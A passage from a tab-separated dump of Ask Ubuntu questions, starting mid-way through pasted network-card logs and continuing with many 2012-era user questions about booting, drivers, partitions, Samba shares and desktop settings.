nbi - > preinit dec 1 13:54:10 andromeda dhclient : listening on lpf/eth0/e8:40 : f2 : e2:4d:86 dec 1 13:54:10 andromeda dhclient : sending on lpf/eth0/e8:40 : f2 : e2:4d:86 dec 1 13:54:10 andromeda dhclient : sending on socket/fallback dec 1 13:54:10 andromeda dhclient : dhcprequest of 192.168.11.17 on eth0 to 255.255.255.255 port 67 dec 1 13:54:10 andromeda dhclient : dhcpack of 192.168.11.17 from 192.168.11.1 dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > address 192.168.11.17 dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > prefix 24 ( 255.255.255.0 ) dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > gateway 192.168.11.1 dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > hostname 'andromeda' dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > nameserver '192.168.11.1' dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > domain name 'hsd1.ca.comcast.net' dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... dec 1 13:54:10 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... dec 1 13:54:10 andromeda avahi-daemon [ 890 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.11.17 . dec 1 13:54:10 andromeda dhclient : bound to 192.168.11.17 -- renewal in 35416 seconds . dec 1 13:54:10 andromeda avahi-daemon [ 890 ] : new relevant interface eth0.ipv4 for mdns . dec 1 13:54:10 andromeda avahi-daemon [ 890 ] : registering new address record for 192.168.11.17 on eth0.ipv4 . dec 1 13:54:11 andromeda networkmanager [ 1115 ] : < info > ( eth0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] dec 1 13:54:11 andromeda networkmanager [ 1115 ] : < info > ( ( null ) ) : writing resolv.conf to /sbin/resolvconf dec 1 13:54:11 andromeda dnsmasq [ 1907 ] : setting upstream servers from dbus dec 1 13:54:11 andromeda dnsmasq [ 1907 ] : using nameserver 192.168.11.1 # 53 dec 1 13:54:11 andromeda networkmanager [ 1115 ] : < info > policy set '82579v ' ( eth0 ) as default for ipv4 routing and dns . dec 1 13:54:11 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) successful , device activated . dec 1 13:54:11 andromeda networkmanager [ 1115 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . dec 1 13:54:11 andromeda dbus [ 800 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) dec 1 13:54:11 andromeda dbus [ 800 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' dec 1 13:54:12 andromeda avahi-daemon [ 890 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :ea40 : f2ff : fee2:4d86 . dec 1 13:54:12 andromeda avahi-daemon [ 890 ] : new relevant interface eth0.ipv6 for mdns . dec 1 13:54:12 andromeda avahi-daemon [ 890 ] : registering new address record for fe80 : :ea40 : f2ff : fee2:4d86 on eth0.* . dec 1 13:54:19 andromeda ntpdate [ 6286 ] : adjust time server 91.189.94.4 offset 0.001142 sec $ lspci -v 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 04 ) subsystem : intel corporation device 2031 flags : bus master , fast devsel , latency 0 , irq 45 memory at f7f00000 ( 32-bit , non-prefetchable ) [ size=128k ] memory at f7f39000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at f040 [ size=32 ] capabilities : [ c8 ] power management version 2 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] pci advanced features kernel driver in use : e1000e kernel modules : e1000e $ modinfo e1000e filename : /lib/modules/3.5.0-19-generic/kernel/drivers/net/e1000e/e1000e.ko version : 2.1.4-napi license : gpl description : intel ( r ) pro/1000 network driver author : intel corporation , < linux.nics @ intel.com > srcversion : 0809529be0bbc44883956af alias : pci : v00008086d0000153bsv*sd*bc*sc*i* alias : pci : v00008086d0000153asv*sd*bc*sc*i* alias : pci : v00008086d00001503sv*sd*bc*sc*i* alias : pci : v00008086d00001502sv*sd*bc*sc*i* alias : pci : v00008086d000010f0sv*sd*bc*sc*i* alias : pci : v00008086d000010efsv*sd*bc*sc*i* alias : pci : v00008086d000010ebsv*sd*bc*sc*i* alias : pci : v00008086d000010easv*sd*bc*sc*i* alias : pci : v00008086d00001525sv*sd*bc*sc*i* alias : pci : v00008086d000010dfsv*sd*bc*sc*i* alias : pci : v00008086d000010desv*sd*bc*sc*i* alias : pci : v00008086d000010cesv*sd*bc*sc*i* alias : pci : v00008086d000010cdsv*sd*bc*sc*i* alias : pci : v00008086d000010ccsv*sd*bc*sc*i* alias : pci : v00008086d000010cbsv*sd*bc*sc*i* alias : pci : v00008086d000010f5sv*sd*bc*sc*i* alias : pci : v00008086d000010bfsv*sd*bc*sc*i* alias : pci : v00008086d000010e5sv*sd*bc*sc*i* alias : pci : v00008086d0000294csv*sd*bc*sc*i* alias : pci : v00008086d000010bdsv*sd*bc*sc*i* alias : pci : v00008086d000010c3sv*sd*bc*sc*i* alias : pci : v00008086d000010c2sv*sd*bc*sc*i* alias : pci : v00008086d000010c0sv*sd*bc*sc*i* alias : pci : v00008086d00001501sv*sd*bc*sc*i* alias : pci : v00008086d00001049sv*sd*bc*sc*i* alias : pci : v00008086d0000104dsv*sd*bc*sc*i* alias : pci : v00008086d0000104bsv*sd*bc*sc*i* alias : pci : v00008086d0000104asv*sd*bc*sc*i* alias : pci : v00008086d000010c4sv*sd*bc*sc*i* alias : pci : v00008086d000010c5sv*sd*bc*sc*i* alias : pci : v00008086d0000104csv*sd*bc*sc*i* alias : pci : v00008086d000010bbsv*sd*bc*sc*i* alias : pci : v00008086d00001098sv*sd*bc*sc*i* alias : pci : v00008086d000010basv*sd*bc*sc*i* alias : pci : v00008086d00001096sv*sd*bc*sc*i* alias : pci : v00008086d0000150csv*sd*bc*sc*i* alias : pci : v00008086d000010f6sv*sd*bc*sc*i* alias : pci : v00008086d000010d3sv*sd*bc*sc*i* alias : pci : v00008086d0000109asv*sd*bc*sc*i* alias : pci : v00008086d0000108csv*sd*bc*sc*i* alias : pci : v00008086d0000108bsv*sd*bc*sc*i* alias : pci : v00008086d0000107fsv*sd*bc*sc*i* alias : pci : v00008086d0000107esv*sd*bc*sc*i* alias : pci : v00008086d0000107dsv*sd*bc*sc*i* alias : pci : v00008086d000010b9sv*sd*bc*sc*i* alias : pci : v00008086d000010d5sv*sd*bc*sc*i* alias : pci : v00008086d000010dasv*sd*bc*sc*i* alias : pci : v00008086d000010d9sv*sd*bc*sc*i* alias : pci : v00008086d00001060sv*sd*bc*sc*i* alias : pci : v00008086d000010a5sv*sd*bc*sc*i* alias : pci : v00008086d000010bcsv*sd*bc*sc*i* alias : pci : v00008086d000010a4sv*sd*bc*sc*i* alias : pci : v00008086d0000105fsv*sd*bc*sc*i* alias : pci : v00008086d0000105esv*sd*bc*sc*i* depends : vermagic : 3.5.0-19-generic smp mod_unload modversions parm : copybreak : maximum size of packet that is copied to a new buffer on receive ( uint ) parm : txintdelay : transmit interrupt delay ( array of int ) parm : txabsintdelay : transmit absolute interrupt delay ( array of int ) parm : rxintdelay : receive interrupt delay ( array of int ) parm : rxabsintdelay : receive absolute interrupt delay ( array of int ) parm : interruptthrottlerate : interrupt throttling rate ( array of int ) parm : intmode : interrupt mode ( array of int ) parm : smartpowerdownenable : enable phy smart power down ( array of int ) parm : kumeranlockloss : enable kumeran lock loss workaround ( array of int ) parm : crcstripping : enable crc stripping , disable if your bmc needs the crc ( array of int ) parm : eee : enable/disable on parts that support the feature ( array of int ) parm : node : [ routing ] node to allocate memory on , default -1 ( array of int ) parm : debug : debug level ( 0=none , ... ,16=all ) ( int )
224404	broke ubuntu 12.04 either with screencloud or ubuntu tweak	earlier today i installed the screen shot app `` screencloud '' and after the installation firefox was having problems . i did n't think much about it , just closed firefox , then proceeded to change the toolbar opacity on ubuntu tweak . after restarting my system , hoping it would fix firefox ( because , you know , restarting fixes everything ; ) ) i am able to go to the log in screen , type in my password , but then i get 3 errors regarding the screencloud ubuntu one , imgur , and dropbox plugins . after clicking the `` okay '' on all three errors , all i see is my wallpaper . i am not able to access the terminal via ctrl > alt > t , but i am able to log out via ctrl > alt > delete . i have tried all desktop environments i have installed ( that , except for unity 2d , has to do with cairo dock . ) i hope i have provided enough information . if you need more , please ask . please help ! i would like to not have to re-install ubuntu . other info : os : ubuntu 12.04 i also have a ubuntu 12.10 live usb , but ubuntu 12.10 has n't run very well on any of my computers .
224407	how can i open specific ports for my apache server ?	how can i open specific ports for my apache server under linux ? i 'm trying to build a connection with a online game that sends messages and receives to a specific port . i want to make my apache server/linux machine to listen to that specific port . bottom line , being able to receive/send data from/to that port
224409	os-prober not recognized !	so due to some shenanigans with trying to get rid of all traces of grub-customizer , i accidentally hit `` delete '' an extra time while in a root nautilus , and deleted my os-prober script in /etc/grub.d/30_os-prober . so i was about to freak out and come here without doing anything when i realized that everything should be beack if i ran sudo apt-get purge os-prober and then sudo apt-get install os-prober . no dice ! it was still gone ! so i ran the same purge/reinstall thing on grub2 . nope ! i have copied over another 30_os-prober from another ubuntu install ( same version and architecture ) , and it works when run in terminal by typing sudo os-prober , but it is n't picked up when running sudo update-grub . help !
224412	maximum number of lenses displayable in ubuntu 12.10 ?	what is the maximum number of lens the heads up display will shown in ubuntu 12.10 ? i would like to know , and i am sure other would as well . i do n't want to install more than allowable or usable .
224413	importing synaptics settings	i 've got a samsung series 5 chromebook which i 've installed ubuntu on . in chrome os the clickpad is working great but in ubuntu it has n't got the same settings so i 'm having problems with selcting text . i managed to find the setting in chrome os , it 's 120 about lines of settings looking like this : device 'synps/2 synaptics touchpad ' : device enabled ( 131 ) : 1 coordinate transformation matrix ( 133 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 265 ) : -1 device accel constant deceleration ( 266 ) : 1.000000 device accel adaptive deceleration ( 267 ) : 1.000000 device accel velocity scaling ( 268 ) : 10.000000 device node ( 250 ) : `` /dev/input/event6 '' now i would like to import these settings to ubuntu . is that possible ?
224419	ca n't create an extended partition	i 'm trying to install 12.10 on a lenovo ideapad u410 . i shrank my windows 8 partition and want to create an extended partition in the unallocated space . but when i try to create a partition there , `` primary '' is the only available option . current table : http : //i.stack.imgur.com/yqepa.png
224422	can not boot into ubuntu 12.10	below given are the steps which i followed to install ubuntu 12.10 with existing windows 8 in my machine . i downloaded ubuntu 12.10 into my disk and made it bootable from my usb by selecting that iso file . then restared my mahine and in bios i selected boot from usb . went into linux os and selected install ubuntu alongside windows 8 . it asked for memory allocation and i selected 550 gb for ubuntu and 404gb for windows . after that it completed ubuntu installation . the booted into my windows 8 and used easybcd to add a new entry . ubuntu grup2 now the easybcd shows , there are a total of 4 entries listed in the bootloader . default : windows 8 timeout : 10 seconds easybcd boot device : c : \ entry # 1 name : lenovo recovery system bcd id : { e58d0cb6-2eae-11e2-9d20-806e6f6e6963 } device : \device\harddiskvolume3 bootloader path : \efi\microsoft\boot\lrsbootmgr.efi entry # 2 name : efi usb device bcd id : { e58d0cb5-2eae-11e2-9d20-806e6f6e6963 } device : unknown bootloader path : entry # 3 name : windows 8 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.efi entry # 4 name : ubuntu 12.10 bcd id : { 6f173570-3bce-11e2-be74-c0143dd589c0 } drive : c : \ bootloader path : \nst\autoneogrub0.mbr next i restarted my system and in the boot options it shows windows 8 and ubuntu 12.10 when i click on ubuntu it displays , \nst\autoneogrub0.mbr status 0xc000007b the application or operating system cold not be loaded because a required file is missing or contains errors . i am able to see c : \nst\autoneogrub0.mbr not sure why it shows file not present can you help me resolve this ... thanks : )
224423	xubuntu : open file browser via `` run command '' menu	in older xubuntu versions , if i entered a path to a directory in the `` run command '' dialog , a thunar-window was opened showing this directory . i found that to be very handy if i would open f.e.g `` /tmp '' , i just needed to press windowskey+r , enter /tmp and press enter , there i was . this was also great for urls ( ftp , http etc ) unfortunately , since 12.04 , this does n't work anymore . it seem as if the `` run command '' is now integrated with the program finder . it still works when i type `` thunar ftp : // ... . '' or `` thunar /tmp '' , but it 's a bit tedious now . is there a way to restore the old behavior ? note : i 'm running a german localization of xubuntu - i hope i translated `` run command '' and `` program finder '' correctly ...
224424	installed amd catalyst driver and am stuck with 800 x 600 resolution and no unity sidebar	first off , compix kept crashing on me . i uninstalled fglrx and installed the amd catalyst driver . when i restarted my computer my resolution stays at 800 x 600 and i ca n't see any sidebar icons so does that mean unity has crashed ? every time i update something this seems to happen to me . can you please help me fix this ?
224426	switching to ubuntu 2d problem	i cant switch to ubuntu 2d at ubuntu 11.10 there are only two options and they are : '' -ubuntu -xbmc media center '' is this the result of installing xbmc ? how can i fix it ?
224427	focus location bar in thunar with keyboard shortcut	is there a keyboard shortcut for focusing the `` location bar '' ( the field that displays the current directory ) ? even the tab-key does not stop at this field , so i have to use the mouse . sometimes , it is faster to just type the path to the location you want to browse instead of navigating . interestingly , thunar seems to encourage this , because it even comes with a auto-completion for directory names ! it would be very handy if the focus could be set with a keyboard shortcut ( e.g . ctrl+d , which is used by most web browsers to do so ) .
224428	is there a way to mimic windows 7 's winkey+number shortcuts ?	one of the biggest things i miss from windows 7 when i 'm on linux is the ability to push winkey and a number to switch to the program in that place on the task bar . ( e.g . you push winkey+1 , and it switches to the first program in the taskbar . ) is there a way to replicate that on ubuntu 12.10 with cinnamon ? i tried to add custom shortcuts to do it , but i do n't know any commands to switch to windows by their place in the taskbar . is this possible ?
224432	simple text editor with margin notes possibility	i am looking for text editor , as simple as it is possible , which will give me opportunity to make margin notes . actually it 's only requirement which i have . currently i use libreoffice writer and i solve this problem by use frames as margin space but it is not as useful as i 've expected . i mean that order of text in frame is quite strange , i am forced to resize text there in every every case and also creating frame always when i want to write . do you know some ubuntu tool which can give me mentioned opportunity ? maybe some kind of online tool either ? thanks in advance .
224433	performance counter information required	i need to learn how performance counter works for my research project . i have understood how hardware supports the monitoring of events.intel manual gives description on how the performance monitoring units on the chip helps to get the counters . i also have learned how the msr module gets the information of the msr registers for various events . i need to learn the following things . 1 ) how performance monitoring tools are used for multiple processes simultaneously . i think all the registers will be saved during context switch and are loaded when the process start again.browsing internet i got something like `` pfm_context_load '' and `` pfm_context_unload '' but it did n't had much info ... ... - > `` i need more detailed information on how it works , so please provide some links , documentation which can help me achieve my understanding '' 2 ) also how performance counters work in virtual environment ? and what are the problems measuring the counters in such environment ? i have browsed through few papers and have some info , but need more detail information . so if anyone can guide me with some documentation on these topics or at least guide me on where should i search for all these info with be a great help ! ... if this is not the right forum then please direct me towards right place.. thanks anup
224435	why does n't java -version return anything with oracle 's jre 7 ?	i 've been following these steps and got up to the check version of new jre installation part but java -version does n't return anything . i have run sudo update-alternatives -- install /usr/bin/java java /usr/lib/jvm/jre1.7.0/bin/java . it returned update-alternatives : using /usr/lib/jvm/jre1.7.0/bin/java to provide /usr/bin/java ( java ) in auto mode so it seems i did that part right . it might have something to with environmental variables , e.g . java_home and path but i 'm not sure how to set them .
224437	low volume problems asus xonar dx	i have problems with my sound card , an asus xonar dx on ubuntu 12.04 lts . to hear something , i need to set ubuntu 's volume at 100 % and speakers volume at 75 % . at this moment i can barely hear something with some quality . but then , at the moment when i increased volume , like a 10 % more , it sounds distorted . how can i fix this ?
224440	libxml2 package installed but can not include , building libaiml	i am trying to build a library ( libaiml ) . i was having problems installing the library using normal methods : ./configure ; make ; make install in the readme , the author says you should use this method to install the libarary , but the standard download does not come with a configure file . to get around this , i decided to import the source into eclipse and try building the library myself . now i am having a problem resolving the libxml2 dependency . i am fairly sure i have the libxml2 package installed : matt @ ubuntu : ~/desktop $ apt-cache policy libxml2 libxml2 : installed : 2.7.8.dfsg-5.1ubuntu4.2 candidate : 2.7.8.dfsg-5.1ubuntu4.2 version table : *** 2.7.8.dfsg-5.1ubuntu4.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages 100 /var/lib/dpkg/status 2.7.8.dfsg-5.1ubuntu4 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main i386 packages but eclipse is saying it can not resolve resolve this inclusion ( in aiml_parser.cpp ) : # include < libxml2/parserinternals.h > in another post , i saw that you could check if a library was installed by running the following command : matt @ ubuntu : ~/desktop $ gcc -lxml2 /usr/bin/ld : can not find -lxml2 collect2 : ld returned 1 exit status if this output is telling me the library can not be found , how is this possible when the package is installed ?
224441	how do applications open from/save to smb shares ?	when , in different applications , using the menu to open/save files , the dialog that appears might offer different choices . a lot of them lacks the ability to browse the network and connect to ( in my case ) a smb ( samba ) share on my nas . my question : where is it going wrong ? or which packages are buggy ? i have samba installed on my machine ( xubuntu 12.10 ) , and also gvfs and its backends . with thunar ( 1.5.3 ) , i can easily access shares by : - clicking the 'browse network ' shortcut in the side pane , - using self-made shortcuts directing to a folder on the share - typing a path such as 'smb : //datastore/action/pictures'when a share is not mounted yet , a dialog appears to enter my credentials . thunar adds the self-made shortcuts to the file ~/.gtk-bookmarks , and to be sure i linked it with .config/gtk-3.0/bookmarks . in libreoffice ( 3.6.2.2 ) i find the same shortcuts as in thunar , only 'browse network ' is missing . shortcuts to a smb share do work but only for browsing . typing in a path works as long as i end it with a '/ ' ( 'smb : //datastore/action/ ' does work , 'smb : //datastore/action ' not ) . when entering 'smb : //datastore/ ' all shares are shown , but clicking them results in an error message `` not a directory '' .when at last i click the save button , i get an error-message stating `` path to the file does not exist '' . if i try to open a file , the dialog closes and nothing happens . the erroneous behavior only seems to be associated with the dialog . opening a libreoffice file on the smb share by clicking it in thunar does work , as does saving it by clicking the save button on the libreoffice toolbar . i tested archive manager ( 3.6.1.1 ) , gthumb ( 3.0.2 ) , gimp ( 2.8.2 ) inkscape ( 0.48.3.1 ) and gnome mplayer ( 1.0.6 ) . they act similar to libreoffice , although opening a file might work . looking at firefox ( 17.0 ) , leafpad ( 0.8.18.1 ) and audacity ( 2.0.1 ) , i find no way to access smb shares . all shortcuts referring to a smb share are missing , typing a path that starts with 'smb : // ' yields no result . so , where is the cause ? is it gvfs , gtk , samba , the applications themselves , some packages missing ? and what about applications that rely on java , python , perl , ... do they need additional packages to access smb shares ? is this a problem only for smb shares ? or is it common to all type of network shares ? maybe it has to do with the recent change of mounting point ( ~/.gvfs/ - > /run/user/ $ user/gvfs/ ) and its awful mappings ? anymore insight information is more than welcome !
224446	how do you boot a standard bash prompt from alternate cd	i need to rescue my 12.04 installation from a serious disk corruption ( symptoms are root file system reports that it 's full even though several gigs are available and there is no visible file or files to delete ) . i also want to be sure this never happens again . i 'm convinced lvm is the tool i need to do that . so my plan is to boot from a usb , archive the root file system ( fsarchiver ) , re-format the raid array , restore the file system , then install lvm into the restored file system , update grub and reboot . the problem is that lvm does not exist on the live cd and the alternate cd does n't have a terminal i 'm familiar with . so the questions are a : does my plan sound valid ? and , how should i get or build a boot image that will be able to see my raid array and allow me to install lvm ? thanx to all , brian
224447	why is my partition claiming to be out of space ?	my file system claims to only have 4.5 gb left . while my os ( a folder with in file system ) still has 75.2 gb left . i put something near 130 gb on my ubuntu partition , it should have enough space . i confirmed that i can put things in os that exceed the space in available file systems , but that makes no sense , os is listed as a folder inside of file system , why would it have more space than it 's parent folder ? what is going on ? here is the output of df : filesystem 1k-blocks used available use % mounted on /dev/sda5 113773200 103741440 4252408 97 % / udev 2004600 4 2004596 1 % /dev tmpfs 804756 848 803908 1 % /run none 5120 0 5120 0 % /run/lock none 2011884 436 2011448 1 % /run/shm /dev/sda2 127526908 54045584 73481324 43 % /media/os /dev/sda3 39144708 89016 39055692 1 % /media/data`
224449	12.04 to 12.10 update is not shown	i am trying to update to ubuntu 12.10 from 12.04 , but the update manager never gives the option , even if i have selected 'notify me of a new ubuntu version : for any new version ' .
224450	is having unity/awesome wm together possible ? how can i do this ?	i would like to have the menus , sidebar , the hud , and the user friendliness ubuntu offers but i would like the window control and the window tiling capabilities of awesome together . google has not helped me much in my search . is this possible ? how can i go about doing this ?
224452	how to put messsenger on top of full screen video ?	just as the title says , how can i use messenger or any chat client while i 'm watching video in browser with full screen ? i can use gtalk when watching youtube video in full screen in windows , but ca n't figure out how to put chat window on full screen video using alt-tab .
224455	how can i return to unity notifications after installing xfce4 ?	after i installed xfce4 , the xfce notifications are being displayed instead of the unity ones . even in unity sessions . how do i set it up so that i get unity notifications in unity sessions and xfce4 notifications in xfce sessions . if i ca n't do that , i just want to know how to get the unity notifications back .
224457	is it true that there will not be 32-bit ubuntu server 12.10 ?	is it true that there will not be 32-bit versions of ubuntu server anymore ? if so , that 's really unfortunate .
224462	i think my bootloader is not loading my window 7 but boot my grub	below is my boot-repair info : http : //paste.ubuntu.com/1403448/ it could load ubuntu in the grub loader but not the window . what should i do ?
224463	how do i reenable opening jar files by double clicking on them ?	how can i make `` double click to run '' the default behaviour of a jar-file on nautilus ? there is no `` open with openjdk java 7 runtime '' on the `` open with '' tab under properties .
224467	how to downgrade from 13.04 to 12.10	i am new to ubuntu and had a update pop up and said yes without looking at it and now i am at 13.04 . i do n't have any problems but i do have an issue of not being able to connect to my windows machines any longer . i ether need to know how to downgrade without losing my data or a simple way to share files again with my other machines . thank you in advance .
224471	windows wubi installer	so while installing windows on my system a few months ago i left ~40 gb to install ubuntu later and now i wan na do it , so is there any way i can use the windows installer to install ubuntu on that unpartitioned free space or i need to install it in the old fashioned way on my current windows installation
224476	allow my kubuntu laptop to connect to wireless w/o asking for my kwallet password ?	is there a way to setup my laptop so when i login it automatically connects to my wireless w/o asking for the password for kwallet to unlock the keystore to connect ? i 'm sure i 'm mixing terms from my mac , but hope you all understand . basically upon login , my laptop would connect w/o prompt to my wireless network . hope it makes sense
224482	cant mount cryptswap1 ?	from the reading i 've done , it seems it 's having issues mounting the encrypted files . the guys here : could not mount /dev/mapper/cryptswap1 seem to be suggesting how to fix it , but i am new to linux and have no idea how to do any of that . can anyone walk me through how to edit that file ? or should i just reinstal ? is there a way to reinstall and keep my programs ? i do have separate partitions for boot root home and swap running acer aspire 5750 intel core i3 4gb ram ubuntu 12.10 64bit
224494	screen lag/running slow	i am having trouble with ubuntu 12.10 . everything is working fine , although there is a slight problem . it seems to lag every once in a while , as in i will move the mouse , then about two seconds later the cursor will actually move on the screen . is there any way to fix this ? this is my first day using ubuntu and i put it on a computer i built myself . i do n't have much experience so a detailed answer would be very much appreciated .
224495	interface is too empty	i have recently installed ubuntu 12.04 0n my pc without any third-party software ( cause i havent been able to get my dial-up to work ) . when i open ubuntu after reboot , there is absolutely nothing on the desktop screen except for an 'untitled ' folder at the corner of the screen . there is no menu , no taskbars at the top whatever . i dont know why this is happening . the .iso from which i have booted amd installed ubuntu is fine . i have already conducted an md5sum test and it was all fine . looking forward to your response .
224500	how to create assault cube lan server ?	i would like to play assault cube with my brother at home an lan . i ca n't seem to figure out how . i would like a simple way . does any one know how to create an assault cube lan server ?
224503	permission denied , trying to install rbenv	i 'm trying to set up my vps for the first time to deploy my rails app . i was trying to install rbenv , and encountered the following error . deployer @ max : ~ $ rbenv bootstrap-ubuntu-12-04 bash : /usr/bin/python : permission denied i tried reinstalling python as well . what am i doing wrong ?
224504	can not install shell-extensions from extensions.gnome.org	i 'm now using gnome shell 3.5.4 on ubuntu 12.04.1 desktop amd64 frederick @ frederick-pasokon : ~ $ gnome-shell -- version gnome shell 3.5.4 when i visit the extensions.gnome.org site , it can normally display the on | off button . and if i slide the button to on , it will pop-up a window to ask me whether i want to install the extension or not . and after i clicked yes , just nothing happened . if i press f5 , the button resets to off as i 've done nothing . trying installing some of the extensions will create a folder in ~/.local/share/gnome-shell/extensions , but it 's empty , without anything inside . i checked my unzip and it 's up-to-date . - please help me !
224508	prevent suspend while streaming over samba	seems this is an open problem -- streaming over samba apparently does n't pause the idle timer on ubuntu ( 12.10 unity ) , so the machine will suspend after the usual 30 minutes despite the fact that i 'm streaming something . i found this solution for gnome , but nothing for unity : http : //aikar.co/2011/03/03/ubuntu-prevent-sleep-samba/ any advice ?
224509	wired connections failed following ubuntu 12.10 recent update	running unbuntu 12.10 with atheros ar8161 - driver installed everything running fine . then did the recent ubuntu software update and the wired connection has stopped working . the wireless is fine and the ethernet is now showing as 'unclaimed' just solved my own problem - simply have to reinstall the atheros driver - using the script given in a previous answer about installing the ar8161 - so many thanks to whoever provided that
224510	how to circumvent full system update to install just 'build-essentials ' ?	after i install a fresh copy of ubuntu ( version 12.04 ) , i need to install build-essentials . to do so , in the terminal i have to run this first : sudo apt-get update & & sudo apt-get upgrade before i 'm able to install build-essentials . these two commands take a lot of time and install many things . is there a way to install build-essentials without running these two commands , or a way that these two commands do n't install all the updates and hence will take less time ?
224511	unable to mount wd my passport 1 tb hard disk on ubuntu 12.10	i m using wd my passport hard drive in windows 7 . it is password protected which i am able to open in any windows os but i am unable to unlock and mount the hdd in ubuntu 12.10 . how can i access my hdd on ubuntu 12.10 ?
224512	firefox on kubuntu downloads icons	i have recently installed kubuntu alongside arch with kde and decided to use firefox as my default browser because i 'm not very fond of rekonq . some time after i installed it i realized that my downloads did not have icons and firefox sometimes had trouble opening them appropriately . is this a bug or some misconfiguration ? if it 's the latter , how can i solve it ? here 's picture illustrating the icon issue :
224513	black screen using dedicated graphics	i have installed ubuntu 12.04 on my laptop . i also have win 7. the thing is i can only boot into both when i change graphics settings in the bios menu and i have to make it integrated . if i have it on switchable , when i try and boot into ubuntu , it shows a purple blank screen for a little while then screen goes blank . if i change it to integrated , i can boot into ubuntu fine and everything works . i do n't want to keep going to the bios menu and changing it for ubuntu , i wish to leave it on switchable so that i can boot into windows and ubuntu . also there is no problem when i try to boot into windows when it is on integrated but i want to boot into windows and use my dedicated graphics not , the integrated one . i have a acer aspire 5750g , the dedicated graphics card on it is a nvidia geforce gt 520m . how can i make it so that i leave it on switchable and i can boot into ubuntu . thanks for any help ! !
224516	bluethooth does n't work on ubuntu 12.10	i 've sony vaio e series laptop vpceh3aea , while i was installing ubuntu 12.10 , the bluetooth worked well . after finishing the installation process , there was a problem that when i tried to activate bluetooth , it should be working but it does n't work at all . the slide button of bluetooth setting never goes to the on option and the hardware indicates it work , plus i ca n't connect my laptop with my bb . is there a solution ? ! thanks in advance
224522	home folder icons dont change	i just installed my-humanity icon theme on my ubuntu 12.10 but i have an issue : i extracted the archive to /usr/share/icons or/and to ~/.icons but when i apply the icon theme from gnome twek tool home folders icons dont update but stay to ubuntu mono dark default icons . only launcher/tray icons change i attach screenshots in order to understand whats my issue : my folder icons on home : how they should be : any ideas on how can i fix it ? note : on nautilus as root ( gksudo nautilus ) they appear how they should be .. only on user do not appear !
224528	virtualbox : verr not supported	i 'm installing windows xp on ubuntu 12.10 by virtual box . when i import iso file , it shows : what should i check ?
224530	gnome 2 style user account settings ( how to edit user accounts in unity )	back in gnome 2 there was a very useful user account editing gui tool whereby i could easily add or edit a user to a group . for example , i could give a standard user access to something that they had n't installed or do n't have default access too , such as me-tv . how do i do this in gnome 3 / unity ? i am not allowed to create the tag `` edit user accounts '' or similar and there is n't anything similar existing , strangely . i 'm guessing there is a totally different way to edit user accounts or no one bothers - perhaps no one shares pcs anymore .
224535	kismet on bcm43227	i am trying to monitor wireless on broadcom bcm43227 , i used sudo airmon-ng to run the monitoring , i get command not found . i installed kismet , when i run , i get this uttam @ ut : ~ $ sudo kismet launching kismet_server : //usr/bin/kismet_server suid priv-dropping disabled . this may not be secure . no specific sources given to be enabled , all will be enabled . non-rfmon vaps will be destroyed on multi-vap interfaces ( ie , madwifi-ng ) enabling channel hopping . enabling channel splitting . notice : disabling channel hopping , no enabled sources are able to change channel . source 0 ( addme ) : opening none source interface none ... fatal : please configure at least one packet source . kismet will not function if no packet sources are defined in kismet.conf or on the command line . please read the readme for more information about configuring kismet . kismet exiting . done . uttam @ ut : ~ $ i did check a blog about kismet on broadcom that says about some binary drivers not allowing to do it ... i used iwconfig and it says no extension : what is that well i need to give a hand on air monitoring ... ... ... ... help , how to do it
224536	numbers on the launcher	using 12.04 lts - few days ago , i left my machine on while i went out . on my return , the launcher was showing ( it is set to be hidden ) and there were small numbers 1-9 on the icons and letters s on the bottom-most icon and t on the rubbish bin . system still worked fine , although the launcher remained visible , and would not hide . after about 20 mins work , they suddenly vanished and the launcher hid itself.. is this a normal action ? it has n't happened since..
224540	distorted graphics in ubuntu after installation ( live session worked perfectly )	i have recently installed ubuntu on my acer s5 ultrabook . things were perfect when i was trying and i created a partition and installed ubuntu . now when i logged in , i am getting a distorted ubuntu screen . i have ivy bridge i7 and intel hd 4000 card on the laptop .
224549	will xubuntu also have amazon ads ?	i 've been reading on the news , forums , and different websites that the new version in 12.10 , which i 'll eventually have to upgrade to if i plan on using ubuntu , has a lens/amazon function on the dash that sends queries to amazon . now , this disturbs me a bit , since i do n't want to see `` shopping recommendations '' everytime i look for something , be they from amazon or from `` future partners '' . does this new `` function '' only apply to the unity desktop ? if i switch to the xfce desktop , will i be able to `` save myself '' from sending search data to amazon and/or shopping recommendations from them ? or will i have to entirely switch distributions , in order to evade this ?
224551	bcm4313 partially working on toshiba satellite r630 ( ubuntu 12.10 )	new to ubuntu . during installation , the computer identified the wifi card and asked me to connect to the network . i did . after the first restart the wifi was working and i could see networks and connect to them . after the second restart the wireless has vanished . still , the broadcom sta drivers are enabled in system settings/additional drivers . tried to restart 5 more times- no effect . i have studied very many topics on askubuntu but none of them work .
